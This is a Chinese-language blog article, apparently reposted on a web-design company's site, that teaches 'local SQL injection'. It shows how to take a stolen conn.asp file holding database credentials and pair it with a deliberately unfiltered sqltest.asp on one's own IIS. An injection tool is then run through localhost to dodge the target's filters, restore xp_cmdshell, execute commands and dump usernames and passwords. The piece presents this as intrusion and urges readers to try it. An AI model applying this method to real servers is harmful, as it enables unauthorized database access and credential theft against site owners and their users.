什么是本地SQL注射-創(chuàng)新互聯(lián)

這篇文章主要介紹“什么是本地SQL注射”，在日常操作中，相信很多人在什么是本地SQL注射問題上存在疑惑，小編查閱了各式資料，整理出簡單好用的操作方法，希望對大家解答”什么是本地SQL注射”的疑惑有所幫助！接下來，請跟著小編一起來學(xué)習(xí)吧！

站在用戶的角度思考問題，與客戶深入溝通，找到達(dá)日網(wǎng)站設(shè)計(jì)與達(dá)日網(wǎng)站推廣的解決方案，憑借多年的經(jīng)驗(yàn)，讓設(shè)計(jì)與互聯(lián)網(wǎng)技術(shù)結(jié)合，創(chuàng)造個性化、用戶體驗(yàn)好的作品，建站類型包括：做網(wǎng)站、成都網(wǎng)站制作、企業(yè)官網(wǎng)、英文網(wǎng)站、手機(jī)端網(wǎng)站、網(wǎng)站推廣、空間域名、雅安服務(wù)器托管、企業(yè)郵箱。業(yè)務(wù)覆蓋達(dá)日地區(qū)。

何為本地注射？簡單地講，就是本來你在服務(wù)器上無法進(jìn)行SQL注入，因?yàn)榉?wù)器上的WEB程序很安全，對request("id")這樣的請求過濾很嚴(yán)，或是限制輸入格式為數(shù)字等等方法，你只能選擇放棄放棄注入。

但是在有的時(shí)候，你可以在本機(jī)的IIS里進(jìn)行注入，從而達(dá)到對服務(wù)器注射的目的，避過服務(wù)器的request參數(shù)提交過濾。舉例子來說明吧，現(xiàn)在你誤打誤撞，利用暴庫或是其他的漏洞，得到了服務(wù)器的conn.asp文件，那么恭喜你，入侵離成功不遠(yuǎn)了。

conn.asp文件代碼一般如下：

<%
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "PROVIDER=SQLOLEDB;DATA SOURCE=61.121.140.37;UID=admin;pwd=12345;DATABASE=master"
%>

這里面記錄的就是服務(wù)器的數(shù)據(jù)庫的一些信息了，一般也會得到連接密碼，說明是MSSQL的系統(tǒng)，非常好搞。如果服務(wù)器有URL可以進(jìn)行SQL語句注射的話，恢復(fù)下XP_CMDshell，我們就能執(zhí)行很多命令了，DOS命令也隨便你。但是很可惜，我們不能注射，只有這么一個conn.asp文件可以利用。

那么，我們在本機(jī)來欺騙服務(wù)器，不過你要知道那個服務(wù)器采用的是什么web程序，不然你下面就不好寫代碼，我們來寫一個sqltest.asp文件，在其中不做任何過濾，將這個文件和conn.asp一起放到你的IIS中的wwwroot下面，這樣你就能通過Localhost來訪問啦。

sqltest.asp代碼如下：

<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL ="select * from DVBBSmdb where GuestID=" & id
rs.open strSQL,conn,1,3
rs.close
%>

那個DVBBSmdb是我虛構(gòu)的，大家要改成這個web程序的數(shù)據(jù)庫的庫名。看到?jīng)]有，id的提交參數(shù)沒有經(jīng)過任何的過濾，沒有用replace或是其他的函數(shù)?，F(xiàn)在我們在啊D中輸入注射URL：http://localhost/sqltest.asp?id=1。接著用啊D在本地服務(wù)器執(zhí)行命令或是跑用戶名和密碼，就等同于在你要入侵的服務(wù)器上進(jìn)行注射，繞過了它的防注入措施。

到此，關(guān)于“什么是本地SQL注射”的學(xué)習(xí)就結(jié)束了，希望能夠解決大家的疑惑。理論與實(shí)踐的搭配能更好的幫助大家學(xué)習(xí)，快去試試吧！若想繼續(xù)學(xué)習(xí)更多相關(guān)知識，請繼續(xù)關(guān)注創(chuàng)新互聯(lián)網(wǎng)站，小編會繼續(xù)努力為大家?guī)砀鄬?shí)用的文章！

新聞名稱：什么是本地SQL注射-創(chuàng)新互聯(lián)
URL標(biāo)題：http://bm7419.com/article44/ggpee.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián)，為您提供App設(shè)計(jì)、網(wǎng)站導(dǎo)航、靜態(tài)網(wǎng)站、做網(wǎng)站、商城網(wǎng)站、品牌網(wǎng)站建設(shè)

廣告

聲明：本網(wǎng)站發(fā)布的內(nèi)容（圖片、視頻和文字）以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主，如果涉及侵權(quán)請盡快告知，我們將會在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場，如需處理請聯(lián)系客服。電話：028-86922220；郵箱：631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載，或轉(zhuǎn)載時(shí)需注明來源： 創(chuàng)新互聯(lián)